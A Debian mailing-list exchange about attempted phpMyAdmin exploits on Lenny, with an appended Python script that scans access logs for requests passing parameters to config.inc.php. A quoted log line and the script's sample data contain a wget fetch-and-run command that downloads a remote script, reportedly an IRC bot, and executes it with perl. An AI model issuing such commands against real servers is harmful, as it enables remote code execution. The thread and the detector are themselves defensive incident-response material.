Hi

On Mon, 29 Jun 2009 10:58:18 +0200 Thijs Kinkhorst <th...@debian.org> wrote:

> Hi Laurant,
>
> > After looking at my logs, I did notice a lot of attempts to break in
> > phpmyadmin through the following kind of url:
> >
> > 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET
> > //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/t
> >mp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null&
> >
> > It seems PHPMyAdmin shipped with Lenny is still vulnerable to this
> > remote exploit
> >
> > It is basically an IRC bot
>
> Version 4:2.11.8.1-5+lenny1 of phpmyadmin, which you say you have installed,
> has been released last Thursday with 1824-1, specifically to address this
> issue. So if all is right then you should be safe from this issue.
>
> Can you explain why you think phpMyAdmin in Lenny is still vulnerable to this
> issue?

phpMyAdmin is not vulnerable, but the exploited config file is still there even
after upgrade....

-- 
Michal Čihař | http://cihar.com | http://blog.cihar.com
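A log check for the request pattern quoted in this thread, as an added example that is not part of the original messages: it flags access-log entries that request a phpMyAdmin `config.inc.php` with a query string and decodes the parameters for triage. The combined log format, the function name and the sample lines (documentation-range addresses) are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Common/combined access-log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)

def suspicious_config_hits(lines):
    """Return log entries that pass query parameters to a phpMyAdmin config.inc.php."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Split by hand: urlsplit() would read the leading "//phpmyadmin" as a host.
        path, _, query = m["target"].partition("?")
        # Collapse doubled slashes in the path only, so URLs inside the query survive.
        path = re.sub(r"/{2,}", "/", path).lower()
        if "phpmyadmin" not in path or not path.endswith("/config.inc.php"):
            continue
        params = parse_qsl(query, keep_blank_values=True)  # percent-decodes values
        if not params:
            continue  # plain request for the file, no parameters passed to it
        # The status is kept for triage; alone it does not show whether anything ran.
        hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                     "path": path, "params": params})
    return hits

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '198.51.100.23 - - [29/Jun/2009:03:32:31 +0200] "GET '
    '//phpmyadmin//config.inc.php?c=wget%20http://192.0.2.10/x.txt%20-O%20/tmp/x.txt'
    ' HTTP/1.1" 200 5 "-" "-"',
    '198.51.100.40 - - [29/Jun/2009:03:40:02 +0200] '
    '"GET /phpmyadmin/index.php?token=abc HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    '198.51.100.41 - - [29/Jun/2009:03:41:10 +0200] '
    '"GET /phpMyAdmin/config.inc.php HTTP/1.1" 200 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in suspicious_config_hits(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["path"], hit["params"])
```

Any hit is a reason to inspect the `config.inc.php` on disk, since, as the reply notes, upgrading the package does not remove a config file that was already modified.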